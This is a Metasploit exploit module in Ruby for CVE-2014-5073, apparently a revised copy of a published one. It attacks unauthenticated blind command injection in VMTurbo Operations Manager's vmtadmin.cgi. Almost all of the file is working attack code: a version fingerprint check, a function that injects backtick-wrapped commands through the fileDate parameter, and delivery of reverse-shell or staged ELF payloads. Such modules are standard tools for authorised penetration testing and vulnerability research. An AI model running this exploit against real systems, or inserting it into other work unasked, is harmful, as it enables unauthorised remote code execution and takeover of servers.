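##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated, blind OS command injection in the vmtadmin.cgi web
# interface of VMTurbo Operations Manager (CVE-2014-5073).
#
# The injection point is the fileDate GET parameter of the CFGBACKUP download
# action; the payload is wrapped in backticks so the target's shell evaluates
# it as a command substitution. No command output is returned, so the module
# can only report that a request was sent.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::EXE

  # Version banner returned by callType=ACTION&actionType=VERSIONS.
  VERSION_RE = /vmtbuild:(?<build>\d+),vmtrelease:(?<release>[\d.]+),vmtbits:\d+,osbits:\d+/.freeze

  # Vulnerable range used by #check, inherited from the original module:
  # release <= 4.6 with a build number below 28657. The exact fixed build is
  # not documented here -- confirm against the vendor advisory before trusting
  # a Safe verdict.
  LAST_VULN_RELEASE = '4.6'.freeze
  FIXED_BUILD = 28657

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',
        'Description' => %q{
          VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
          OS Command injection in the web interface. Use reverse payloads for the most
          reliable results. Since it is a blind OS command injection vulnerability,
          there is no output for the executed command when using the cmd generic payload.
          Port binding payloads are disregarded due to the restrictive firewall settings.

          This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
          4.6.
        },
        'Author' => [
          # Secunia Research - Discovery and Metasploit module
          'Emilio Pinna <emilio.pinn[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-5073'],
          ['OSVDB', '109572'],
          ['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']
        ],
        'DisclosureDate' => '2014-06-25',
        'Privileged' => false,
        # Bind payloads are excluded: the description notes the appliance's
        # firewall blocks inbound connections, so only reverse payloads are offered.
        'Payload' => {
          'Compat' => {
            'ConnectionType' => '-bind'
          }
        },
        'Targets' => [
          [
            'Unix CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [
            'VMTurbo Operations Manager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 1,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # The stager flavor is fixed to :printf in #exploit; hide the options so a
    # user cannot select a flavor whose quoting would not survive the injection
    # context (presumably the reason the original module removed them).
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Fingerprints the target by requesting the VERSIONS action from vmtadmin.cgi.
  #
  # Returns Exploit::CheckCode::Unknown when the host cannot be reached or the
  # banner is not recognised, Detected when a banner is present but its release
  # string cannot be parsed, Appears when the release/build falls inside the
  # vulnerable range, and Safe otherwise.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'vars_get' => {
          'callType' => 'ACTION',
          'actionType' => 'VERSIONS'
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error('Failed to connect to the web server')
      return Exploit::CheckCode::Unknown
    end

    # send_request_cgi yields nil on a timeout, hence the nil guard.
    banner = (res && res.code == 200) ? res.body.to_s.match(VERSION_RE) : nil
    unless banner
      vprint_status('Unexpected vmtadmin.cgi response')
      return Exploit::CheckCode::Unknown
    end

    release = banner[:release]
    build = banner[:build]
    vprint_status("VMTurbo Operations Manager version #{release} build #{build} detected")

    # Compare as a version and an integer, not as strings. The original module
    # compared strings, for which '10.6' <= '4.6' and '9999' < '28657' are both
    # true, so builds were misclassified in both directions.
    unless Rex::Version.correct?(release)
      vprint_status("Unparseable release string '#{release}'")
      return Exploit::CheckCode::Detected
    end

    vulnerable = Rex::Version.new(release) <= Rex::Version.new(LAST_VULN_RELEASE) &&
                 build.to_i < FIXED_BUILD

    vulnerable ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  # Sends one command through the fileDate parameter of the CFGBACKUP action,
  # wrapped in backticks so that the shell the CGI hands it to runs it as a
  # command substitution.
  #
  # cmd is inserted without escaping: a payload containing a backtick or a
  # double quote would terminate the substitution early. _opts is unused.
  #
  # Returns nil when the web server cannot be reached and true once the request
  # has been sent. The injection is blind, so true means "request dispatched",
  # not "command succeeded". The original returned whatever vprint_status
  # returned, which is nil unless VERBOSE is set, so #exploit's result check
  # failed in the default configuration even though the request went out.
  def execute_command(cmd, _opts)
    begin
      send_request_cgi({
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'method' => 'GET',
        'vars_get' => {
          'callType' => 'DOWN',
          'actionType' => 'CFGBACKUP',
          'fileDate' => "\"`#{cmd}`\""
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error('Failed to connect to the web server')
      return nil
    end

    vprint_status("Sent command #{cmd}")
    true
  end

  # Delivers the payload.
  #
  # The Unix CMD target fires payload.encoded in a single injected request and
  # reports an unknown state, since nothing comes back from a blind injection.
  # The native target stages an ELF through CmdStager with the printf flavor,
  # whose generated commands are expected to survive the backtick context.
  def exploit
    if target.name =~ /CMD/
      unless execute_command(payload.encoded, {})
        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
      end

      print_status('Blind Exploitation - unknown exploitation state')
      return
    end

    execute_cmdstager({ flavor: :printf })
  end
end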